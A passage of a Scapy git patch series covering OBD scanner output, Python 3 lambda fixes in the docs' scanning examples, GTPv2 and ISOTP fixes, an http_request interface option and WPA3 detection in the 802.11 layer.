result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.09", "-ru"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out, std_err = result.communicate() + print(std_out) + print(std_err) assert std_err == b'' - - if six.PY2: - expected_output = [b"Service 3:\nC\x01\x00\x00", - b"Service 1:\n{", - b"3: 'A\\x03\\x00\\x02'", - b"11: 'A\\x0bd'", - b"15: 'A\\x0fZ'", - b"Service 1:\n{1: 'A\\x01\\x00\\x00\\x00\\x00'"] - else: - expected_output = [b"Service 3:\nb'C\\x01\\x00\\x00'", - b"Service 1:\n{", - b"3: b'A\\x03\\x00\\x02'", - b"11: b'A\\x0bd'", - b"15: b'A\\x0fZ'", - b"Service 1:\n{1: b'A\\x01\\x00\\x00\\x00\\x00'"] - + time.sleep(1) + expected_output = ["256 requests were sent", + "1 requests were sent, 1 answered"] for out in expected_output: + print(out) assert bytes_encode(out) in bytes_encode(std_out) - + except Exception as e: + print(e) + tester.send(b"\x01\xff\xff\xff\xff") + sim.join(timeout=10) + raise e finally: - isocan.send(CAN(identifier=0x7e0, data=b'\x07\xff\xff\xff\xff\xff\xff\xff')) - time.sleep(0) - isocan.send(CAN(identifier=0x7e0, data=b'\x07\xff\xff\xff\xff\xff\xff\xff')) + tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) From 5ad976af0607a15029a436803c0d698e25a4778c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 28 Apr 2020 12:40:41 +0200 Subject: [PATCH 0156/1632] update output of scanner --- scapy/contrib/automotive/obd/scanner.py | 28 ++++++++++++++++++------- 1 file changed, 21 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index 3a01165b588..0fe9bd6e882 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -168,11 +168,13 @@ def get_pkts(self, p_range): @staticmethod def get_table_entry(tup): - _, req, res = tup + _, _, res = tup label = OBD_Enumerator.get_label( res, positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return "Service 01", "0x%02x" % req.pid[0], label + return ("Service 01", + "%s" % res.data_records[0].lastlayer().name, + label) class OBD_S02_Enumerator(OBD_Service_Enumerator): @@ -184,11 +186,13 @@ def get_pkts(self, p_range): @staticmethod def get_table_entry(tup): - _, req, res = tup + _, _, res = tup label = OBD_Enumerator.get_label( res, positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return "Service 02", "0x%02x" % req.pid[0], label + return ("Service 02", + "%s" % res.data_records[0].lastlayer().name, + label) class OBD_S06_Enumerator(OBD_Service_Enumerator): @@ -203,7 +207,11 @@ def get_table_entry(tup): label = OBD_Enumerator.get_label( res, positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return "Service 06", "0x%02x" % req.mid[0], label + return ("Service 06", + "0x%02x %s" % ( + req.mid[0], + res.data_records[0].sprintf("%OBD_S06_PR_Record.mid%")), + label) class OBD_S08_Enumerator(OBD_Service_Enumerator): @@ -218,7 +226,10 @@ def get_table_entry(tup): label = OBD_Enumerator.get_label( res, positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return "Service 08", "0x%02x" % req.tid[0], label + return ("Service 08", + "0x%02x %s" % (req.tid[0], + res.data_records[0].lastlayer().name), + label) class OBD_S09_Enumerator(OBD_Service_Enumerator): @@ -233,7 +244,10 @@ def get_table_entry(tup): label = OBD_Enumerator.get_label( res, positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) - return "Service 09", "0x%02x" % req.iid[0], label + return ("Service 09", + "0x%02x %s" % (req.iid[0], + res.data_records[0].lastlayer().name), + label) class OBD_Scanner(Scanner): From 1ee4b62ca448cf03aebf33063fe2861f7f40bf25 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Mon, 18 May 2020 12:43:58 +0200 Subject: [PATCH 0157/1632] Update dot15d4 header # Intern at INRIA Grand Nancy Est was copy pasted wrongly from sixlowpan --- scapy/layers/dot15d4.py | 1 - 1 file changed, 1 deletion(-) diff --git a/scapy/layers/dot15d4.py b/scapy/layers/dot15d4.py index 7e93b25944c..8e111b6dc83 100644 --- a/scapy/layers/dot15d4.py +++ b/scapy/layers/dot15d4.py @@ -4,7 +4,6 @@ # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames # Copyright (C) Gabriel Potter : 2018 -# Intern at INRIA Grand Nancy Est # This program is published under a GPLv2 license """ From b2f92e8c3bd26b08a9d616b6407966c71561a8e9 Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 18 May 2020 14:39:52 +0200 Subject: [PATCH 0158/1632] Fix #2626 lambdas on Python3 --- doc/scapy/usage.rst | 32 ++++++++++++++++---------------- scapy/plist.py | 21 ++++++++++++++++----- 2 files changed, 32 insertions(+), 21 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 53030e8180c..377b518f638 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -403,7 +403,7 @@ In order to quickly review responses simply request a summary of collected packe The above will display stimulus/response pairs for answered probes. We can display only the information we are interested in by using a simple loop: - >>> ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") ) + >>> ans.summary( lambda s,r: r.sprintf("%TCP.sport% \t %TCP.flags%") ) 440 RA 441 RA 442 RA @@ -417,7 +417,7 @@ Even better, a table can be built using the ``make_table()`` function to display **.*.*..*.................. Received 362 packets, got 8 answers, remaining 1 packets >>> ans.make_table( - ... lambda(s,r): (s.dst, s.dport, + ... lambda s,r: (s.dst, s.dport, ... r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}"))) 66.35.250.150 192.168.1.1 216.109.112.135 22 66.35.250.150 - dest-unreach RA - @@ -428,17 +428,17 @@ The above example will even print the ICMP error type if the ICMP packet was rec For larger scans, we could be interested in displaying only certain responses. The example below will only display packets with the “SA” flag set:: - >>> ans.nsummary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA") + >>> ans.nsummary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "SA") 0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA In case we want to do some expert analysis of responses, we can use the following command to indicate which ports are open:: - >>> ans.summary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA",prn=lambda(s,r):r.sprintf("%TCP.sport% is open")) + >>> ans.summary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "SA",prn=lambda s,r: r.sprintf("%TCP.sport% is open")) https is open Again, for larger scans we can build a table of open ports:: - >>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r): + >>> ans.filter(lambda s,r: TCP in r and r[TCP].flags&2).make_table(lambda s,r: ... (s.dst, s.dport, "X")) 66.35.250.150 192.168.1.1 216.109.112.135 80 X - X @@ -980,7 +980,7 @@ Here we can see a multi-parallel traceroute (Scapy already has a multi TCP trace >>> ans, unans = sr(IP(dst="www.test.fr/30", ttl=(1,6))/TCP()) Received 49 packets, got 24 answers, remaining 0 packets - >>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) ) + >>> ans.make_table( lambda s,r: (s.dst, s.ttl, r.src) ) 216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 @@ -995,7 +995,7 @@ Here is a more complex example to distinguish machines or their IP stacks from t >>> ans, unans = sr(IP(dst="172.20.80.192/28")/TCP(dport=[20,21,22,25,53,80])) Received 142 packets, got 25 answers, remaining 71 packets - >>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf("%IP.id%"))) + >>> ans.make_table(lambda s,r: (s.dst, s.dport, r.sprintf("%IP.id%"))) 172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.20.80.201 20 0 4203 7021 - 11562 21 0 4204 7022 - 11563 @@ -1254,7 +1254,7 @@ The fastest way to discover hosts on a local ethernet network is to use the ARP Answers can be reviewed with the following command:: - >>> ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") ) + >>> ans.summary(lambda s,r: r.sprintf("%Ether.src% %ARP.psrc%") ) Scapy also includes a built-in arping() function which performs similar to the above two commands: @@ -1270,7 +1270,7 @@ Classical ICMP Ping can be emulated using the following command:: Information on live hosts can be collected with the following request:: - >>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") ) + >>> ans.summary(lambda s,r: r.sprintf("%IP.src% is alive") ) TCP Ping @@ -1282,7 +1282,7 @@ In cases where ICMP echo requests are blocked, we can still use various TCP Ping Any response to our probes will indicate a live host. We can collect results with the following command:: - >>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) + >>> ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) UDP Ping @@ -1292,9 +1292,9 @@ If all else fails there is always UDP Ping which will produce ICMP Port unreacha >>> ans, unans = sr( IP(dst="192.168.*.1-10")/UDP(dport=0) ) -Once again, results can be collected with this command: +Once again, results can be collected with this command:: - >>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) + >>> ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) DNS Requests @@ -1377,7 +1377,7 @@ Possible result visualization: open ports :: - >>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) ) + >>> res.nsummary( lfilter=lambda s,r: (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) ) IKE Scanning @@ -1393,7 +1393,7 @@ and receiving the answers:: Visualizing the results in a list:: - >>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) ) + >>> res.nsummary(prn=lambda s,r: r.src, lfilter=lambda s,r: r.haslayer(ISAKMP) ) @@ -1409,7 +1409,7 @@ TCP SYN traceroute Results would be:: - >>> ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}")) + >>> ans.summary( lambda s,r: r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}")) 192.168.1.1 time-exceeded 68.86.90.162 time-exceeded 4.79.43.134 time-exceeded @@ -1431,7 +1431,7 @@ NTP, etc.) to deserve an answer:: We can visualize the results as a list of routers:: - >>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src)) + >>> res.make_table(lambda s,r: (s.dst, s.ttl, r.src)) DNS traceroute diff --git a/scapy/plist.py b/scapy/plist.py index d3f05eb51d5..d50d3f6bd2a 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -146,14 +146,18 @@ def summary(self, prn=None, lfilter=None): :param lfilter: truth function to apply to each packet to decide whether it will be displayed """ + # Python 2 backward compatibility + prn = lambda_tuple_converter(prn) + lfilter = lambda_tuple_converter(lfilter) + for r in self.res: if lfilter is not None: - if not lfilter(r): + if not lfilter(*r): continue if prn is None: print(self._elt2sum(r)) else: - print(prn(r)) + print(prn(*r)) def nsummary(self, prn=None, lfilter=None): # type: (Optional[Callable], Optional[Callable]) -> None @@ -164,15 +168,19 @@ def nsummary(self, prn=None, lfilter=None): :param lfilter: truth function to apply to each packet to decide whether it will be displayed """ + # Python 2 backward compatibility + prn = lambda_tuple_converter(prn) + lfilter = lambda_tuple_converter(lfilter) + for i, res in enumerate(self.res): if lfilter is not None: - if not lfilter(res): + if not lfilter(*res): continue print(conf.color_theme.id(i, fmt="%04i"), end=' ') if prn is None: print(self._elt2sum(res)) else: - print(prn(res)) + print(prn(*res)) def display(self): # Deprecated. Use show() """deprecated. is show()""" @@ -187,7 +195,10 @@ def filter(self, func): # type: (Callable) -> PacketList """Returns a packet list filtered by a truth function. This truth function has to take a packet as the only argument and return a boolean value.""" # noqa: E501 - return self.__class__([x for x in self.res if func(x)], + # Python 2 backward compatibility + func = lambda_tuple_converter(func) + + return self.__class__([x for x in self.res if func(*x)], name="filtered %s" % self.listname) def make_table(self, *args, **kargs): From 3438a425f51cb4d4de504d4020837b059fc43f09 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 18 May 2020 11:35:47 -0400 Subject: [PATCH 0159/1632] Revert ULI fields changes --- scapy/contrib/gtp_v2.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 7530f680805..6f2e738f146 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -345,8 +345,8 @@ class ULI_CGI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("LAC", 0, 16), - BitField("CI", 0, 16), + ShortField("LAC", 0), + ShortField("CI", 0), ] @@ -355,8 +355,8 @@ class ULI_SAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("LAC", 0, 16), - BitField("SAC", 0, 16), + ShortField("LAC", 0), + ShortField("SAC", 0), ] @@ -367,8 +367,8 @@ class ULI_RAI(ULI_Field): # MNC: if the third digit of MCC is 0xf, then the length of # MNC is 1 byte gtp.TBCDByteField("MNC", "", 1), - BitField("LAC", 0, 16), - BitField("RAC", 0, 16), + ShortField("LAC", 0), + ShortField("RAC", 0), ] @@ -377,7 +377,7 @@ class ULI_TAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("TAC", 0, 16), + ShortField("TAC", 0), ] @@ -396,7 +396,7 @@ class ULI_LAI(ULI_Field): fields_desc = [ gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("LAC", 0, 16), + ShortField("LAC", 0), ] From c9f2976cd95817a55058674905da7deae43fd095 Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 18 May 2020 14:59:52 +0200 Subject: [PATCH 0160/1632] Add iface support http_request --- scapy/layers/http.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index eb8451eab93..0624ac70290 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -621,7 +621,8 @@ def guess_payload_class(self, payload): def http_request(host, path="/", port=80, timeout=3, display=False, verbose=0, - iptables=False, **headers): + iptables=False, iface=None, + **headers): """Util to perform an HTTP request, using the TCP_client. :param host: the host to connect to @@ -629,6 +630,7 @@ def http_request(host, path="/", port=80, timeout=3, :param port: the port (default 80) :param timeout: timeout before None is returned :param display: display the resullt in the default browser (default False) + :param iface: interface to use. default: conf.iface :param iptables: temporarily prevents the kernel from answering with a TCP RESET message. :param headers: any additional headers passed to the request @@ -645,7 +647,8 @@ def http_request(host, path="/", port=80, timeout=3, } http_headers.update(headers) req = HTTP() / HTTPRequest(**http_headers) - tcp_client = TCP_client.tcplink(HTTP, host, port, debug=verbose) + tcp_client = TCP_client.tcplink(HTTP, host, port, debug=verbose, + iface=iface) ans = None if iptables: ip = tcp_client.atmt.dst From 5bc2fbcf4a71327d4697c6fe3a56929981311d79 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 18 May 2020 15:21:20 -0400 Subject: [PATCH 0161/1632] Fix IE_FQCSID --- scapy/contrib/gtp_v2.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 6f2e738f146..1fec0dbfa80 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1387,8 +1387,16 @@ class IE_FQCSID(gtp.IE_Base): BitField("instance", 0, 4), BitField("nodeid_type", 0, 4), BitField("num_csid", 0, 4), - ByteField("node_id", 0), - ByteField("csids", 0)] + ConditionalField( + IPField("nodeid_v4", 0), + lambda pkt: pkt.nodeid_type is 0), + ConditionalField( + XBitField("nodeid_v6", "2001:db8:0:42::", 128), + lambda pkt: pkt.nodeid_type is 1), + ConditionalField( + BitField("nodeid_nonip", 0, 32), + lambda pkt: pkt.nodeid_type is 2), + ShortField("csid", 0)] class IE_Ran_Nas_Cause(gtp.IE_Base): From d0c9136dbcddf2799f16dce9172bb96eec23dad8 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 18 May 2020 17:34:24 -0400 Subject: [PATCH 0162/1632] Add test case for IE_FQCSID --- test/contrib/gtp_v2.uts | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 1019b1bc7cd..252cac06121 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -258,6 +258,16 @@ ie.protocol_type == 3 and ie.cause_type == 0 and ie.cause_value == 17 ie = IE_Ran_Nas_Cause(ietype='RAN/NAS Cause', length=2, CR_flag=0, instance=0, protocol_type=3, cause_type=0, cause_value=17) ie.ietype == 172 and ie.protocol_type == 3 and ie.cause_type == 0 and ie.cause_value == 17 += IE_FQCSID, dissection +h = "d89ef3da40e2fa163e956dce0800450000330001000040117a2a0a0f0f3d0a09dd3a084b084b001f454648240013000000010000010084000700010a01010b00c8" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.ietype == 132 and ie.nodeid_type == 0 and ie.num_csid == 1 and ie.nodeid_v4 == '10.1.1.11' and ie.csid == 200 + += IE_FQCSID, basic instantiation +ie = IE_FQCSID(ietype=132, length=19, CR_flag=0, instance=0, nodeid_type=1, num_csid=1, nodeid_v4=None, nodeid_v6=42540578207381523466529575969228128257, nodeid_nonip=None, csid=0) +ie.ietype == 132 and ie.nodeid_type == 1 and ie.num_csid == 1 and ie.nodeid_v6 == 42540578207381523466529575969228128257 and ie.csid == 0 + = IE_FTEID, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) From 098d1795b327a2e8e29a73a5f4aab5f361cc8867 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 18 May 2020 19:06:32 -0400 Subject: [PATCH 0163/1632] Fix length for Indication IE --- scapy/contrib/gtp_v2.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 1fec0dbfa80..367e34d9e47 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -734,7 +734,9 @@ class IE_MSISDN(gtp.IE_Base): class IE_Indication(gtp.IE_Base): name = "IE Indication" fields_desc = [ByteEnumField("ietype", 77, IEType), - FieldLenField("length", 8), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ConditionalField( From fa491b49983094de03bd72da776e7590dd6d995a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 19 May 2020 10:32:51 +0200 Subject: [PATCH 0164/1632] Cleanup debug prints in ISOTPSoftSocket --- scapy/contrib/isotp.py | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 6184a6b1bd5..0d5354483c9 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -1141,8 +1141,8 @@ def on_can_recv(self, p): if not isinstance(p, CAN): raise Scapy_Exception("argument is not a CAN frame") if p.identifier != self.dst_id: - if not self.filter_warning_emitted: - warning("You should put a filter for identifier=%x on your" + if not self.filter_warning_emitted and conf.verb >= 2: + warning("You should put a filter for identifier=%x on your " "CAN socket" % self.dst_id) self.filter_warning_emitted = True else: @@ -1160,7 +1160,8 @@ def _rx_timer_handler(self): # we did not get new data frames in time. # reset rx state self.rx_state = ISOTP_IDLE - warning("RX state was reset due to timeout") + if conf.verb > 2: + warning("RX state was reset due to timeout") def _tx_timer_handler(self): """Method called every time the tx_timer times out, which can happen in @@ -1313,7 +1314,8 @@ def _recv_sf(self, data): self.rx_timeout_handle = None if self.rx_state != ISOTP_IDLE: - warning("RX state was reset because single frame was received") + if conf.verb > 2: + warning("RX state was reset because single frame was received") self.rx_state = ISOTP_IDLE length = six.indexbytes(data, 0) & 0xf @@ -1334,7 +1336,8 @@ def _recv_ff(self, data): self.rx_timeout_handle = None if self.rx_state != ISOTP_IDLE: - warning("RX state was reset because first frame was received") + if conf.verb > 2: + warning("RX state was reset because first frame was received") self.rx_state = ISOTP_IDLE if len(data) < 7: @@ -1395,13 +1398,15 @@ def _recv_cf(self, data): if len(data) < self.rx_ll_dl: # this is only allowed for the last CF if self.rx_len - self.rx_idx > self.rx_ll_dl: - warning("Received a CF with insuffifient length") + if conf.verb > 2: + warning("Received a CF with insufficient length") return 1 if six.indexbytes(data, 0) & 0x0f != self.rx_sn: # Wrong sequence number - warning("RX state was reset because wrong sequence number was " - "received") + if conf.verb > 2: + warning("RX state was reset because wrong sequence number was " + "received") self.rx_state = ISOTP_IDLE return 1 From c00393dff12682ba1176b45848146b4a4e548413 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 19 May 2020 19:09:59 +0200 Subject: [PATCH 0165/1632] Fix LGTM issues for isotp.py and ccp.py (#2645) * Fix some issues found by lgtm * add exception on double cancel of handle * update cancel of Handle --- scapy/contrib/automotive/ccp.py | 4 ++++ scapy/contrib/isotp.py | 38 +++++++++++++++++++++++++++------ 2 files changed, 36 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/ccp.py b/scapy/contrib/automotive/ccp.py index 2f9135448b6..cfb61571bbf 100644 --- a/scapy/contrib/automotive/ccp.py +++ b/scapy/contrib/automotive/ccp.py @@ -530,6 +530,10 @@ def __init__(self, *args, **kwargs): del kwargs["payload_cls"] Packet.__init__(self, *args, **kwargs) + def __eq__(self, other): + return super(DTO, self).__eq__(other) and \ + self.payload_cls == other.payload_cls + def guess_payload_class(self, payload): return self.payload_cls diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 6184a6b1bd5..450117a8cad 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -200,6 +200,10 @@ def defragment(can_frames, use_extended_addressing=None): return results[0] + def __eq__(self, other): + # Don't compare src, dst, exsrc and exdst. + return super(ISOTP, self).__eq__(other) + class ISOTPHeader(CAN): name = 'ISOTPHeader' @@ -646,8 +650,8 @@ def __init__(self, """ if six.PY3 and LINUX and isinstance(can_socket, six.string_types): - from scapy.contrib.cansocket import CANSocket - can_socket = CANSocket(can_socket) + from scapy.contrib.cansocket_native import NativeCANSocket + can_socket = NativeCANSocket(can_socket) elif isinstance(can_socket, six.string_types): raise Scapy_Exception("Provide a CANSocket object instead") @@ -873,7 +877,7 @@ def cancel(handle): # set the event to stop the wait - this kills the thread TimeoutScheduler._event.set() else: - Exception("Handle not found") + raise Scapy_Exception("Handle not found") @staticmethod def clear(): @@ -970,9 +974,12 @@ def _poll(): # Time complexity is O(log n) handle = heapq.heappop(handles) + callback = None + if handle is not None: + callback = handle._cb + handle._cb = True # Call the callback here, outside of the mutex - callback = handle._cb if handle is not None else None if callback is not None: try: callback() @@ -997,8 +1004,18 @@ def __init__(self, when, cb): def cancel(self): """Cancels this timeout, preventing it from executing its callback""" - self._cb = None - return TimeoutScheduler.cancel(self) + if self._cb is None: + raise Scapy_Exception("cancel() called on " + "previous canceled Handle") + else: + if isinstance(self._cb, bool): + # Handle was already executed. + # We don't need to cancel anymore + return False + else: + self._cb = None + TimeoutScheduler.cancel(self) + return True def __cmp__(self, other): diff = self._when - other._when @@ -1007,6 +1024,15 @@ def __cmp__(self, other): def __lt__(self, other): return self._when < other._when + def __le__(self, other): + return self._when <= other._when + + def __gt__(self, other): + return self._when > other._when + + def __ge__(self, other): + return self._when >= other._when + """ISOTPSoftSocket definitions.""" From 8c4dad945b29660e9d32c228bfc18237b1acd6a2 Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 18 May 2020 18:19:44 +0200 Subject: [PATCH 0166/1632] WPA3 detection --- scapy/layers/dot11.py | 98 ++++++++++++++++++++++++++++++++----------- test/regression.uts | 12 ++++++ 2 files changed, 85 insertions(+), 25 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 02f6a35b9b1..020f4f7468e 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -592,22 +592,16 @@ def guess_payload_class(self, payload): 16: "timeout", 17: "AP-full", 18: "rate-unsupported"} -class _Dot11NetStats(Packet): - fields_desc = [LELongField("timestamp", 0), - LEShortField("beacon_interval", 0x0064), - FlagsField("cap", 0, 16, capability_list)] - +class _Dot11EltUtils(Packet): + """ + Contains utils for classes that have Dot11Elt as payloads + """ def network_stats(self): """Return a dictionary containing a summary of the Dot11 elements fields """ summary = {} crypto = set() - akmsuite_types = { - 0x00: "Reserved", - 0x01: "802.1X", - 0x02: "PSK" - } p = self.payload while isinstance(p, Dot11Elt): if p.ID == 0: @@ -628,16 +622,40 @@ def network_stats(self): elif isinstance(p, Dot11EltRates): summary["rates"] = p.rates elif isinstance(p, Dot11EltRSN): + wpa_version = "WPA2" + # WPA3-only: + # - AP shall at least enable AKM suite selector 00-0F-AC:8 + # - AP shall not enable AKM suite selector 00-0F-AC:2 and + # 00-0F-AC:6 + # - AP shall set MFPC and MFPR to 1 + # - AP shall not enable WEP and TKIP + # WPA3-transition: + # - AP shall at least enable AKM suite selector 00-0F-AC:2 + # and 00-0F-AC:8 + # - AP shall set MFPC to 1 and MFPR to 0 + if any(x.suite == 8 for x in p.akm_suites) and \ + all(x.suite not in [2, 6] for x in p.akm_suites) and \ + p.mfp_capable and p.mfp_required and \ + all(x.cipher not in [1, 2, 5] + for x in p.pairwise_cipher_suites): + # WPA3 only mode + wpa_version = "WPA3" + elif any(x.suite == 8 for x in p.akm_suites) and \ + any(x.suite == 2 for x in p.akm_suites) and \ + p.mfp_capable and not p.mfp_required: + # WPA3 transition mode + wpa_version = "WPA3-transition" + # Append suite if p.akm_suites: - auth = akmsuite_types.get(p.akm_suites[0].suite) - crypto.add("WPA2/%s" % auth) + auth = p.akm_suites[0].sprintf("%suite%") + crypto.add(wpa_version + "/%s" % auth) else: - crypto.add("WPA2") + crypto.add(wpa_version) elif p.ID == 221: if isinstance(p, Dot11EltMicrosoftWPA) or \ p.info.startswith(b'\x00P\xf2\x01\x01\x00'): if p.akm_suites: - auth = akmsuite_types.get(p.akm_suites[0].suite) + auth = p.akm_suites[0].sprintf("%suite%") crypto.add("WPA/%s" % auth) else: crypto.add("WPA") @@ -651,8 +669,11 @@ def network_stats(self): return summary -class Dot11Beacon(_Dot11NetStats): +class Dot11Beacon(_Dot11EltUtils): name = "802.11 Beacon" + fields_desc = [LELongField("timestamp", 0), + LEShortField("beacon_interval", 0x0064), + FlagsField("cap", 0, 16, capability_list)] _dot11_info_elts_ids = { @@ -754,9 +775,17 @@ class RSNCipherSuite(Packet): 0x00: "Use group cipher suite", 0x01: "WEP-40", 0x02: "TKIP", - 0x03: "Reserved", + 0x03: "OCB", 0x04: "CCMP", - 0x05: "WEP-104" + 0x05: "WEP-104", + 0x06: "BIP-128", + 0x07: "Group addressed traffic not allowed", + 0x08: "GCMP-128", + 0x09: "GCMP-256", + 0x0A: "CCMP-256", + 0x0B: "BIP-GMAC-128", + 0x0C: "BIP-GMAC-256", + 0x0D: "BIP-CMAC-256" }) ] @@ -770,8 +799,24 @@ class AKMSuite(Packet): X3BytesField("oui", 0x000fac), ByteEnumField("suite", 0x01, { 0x00: "Reserved", - 0x01: "IEEE 802.1X / PMKSA caching", - 0x02: "PSK" + 0x01: "802.1X", + 0x02: "PSK", + 0x03: "FT-802.1X", + 0x04: "FT-PSK", + 0x05: "WPA-SHA256", + 0x06: "PSK-SHA256", + 0x07: "TDLS", + 0x08: "SAE", + 0x09: "FT-SAE", + 0x0A: "AP-PEER-KEY", + 0x0B: "WPA-SHA256-SUITE-B", + 0x0C: "WPA-SHA384-SUITE-B", + 0x0D: "FT-802.1X-SHA384", + 0x0E: "FILS-SHA256", + 0x0F: "FILS-SHA384", + 0x10: "FT-FILS-SHA256", + 0x11: "FT-FILS-SHA384", + 0x12: "OWE" }) ] @@ -946,20 +991,20 @@ class Dot11Disas(Packet): fields_desc = [LEShortEnumField("reason", 1, reason_code)] -class Dot11AssoReq(Packet): +class Dot11AssoReq(_Dot11EltUtils): name = "802.11 Association Request" fields_desc = [FlagsField("cap", 0, 16, capability_list), LEShortField("listen_interval", 0x00c8)] -class Dot11AssoResp(Packet): +class Dot11AssoResp(_Dot11EltUtils): name = "802.11 Association Response" fields_desc = [FlagsField("cap", 0, 16, capability_list), LEShortField("status", 0), LEShortField("AID", 0)] -class Dot11ReassoReq(Packet): +class 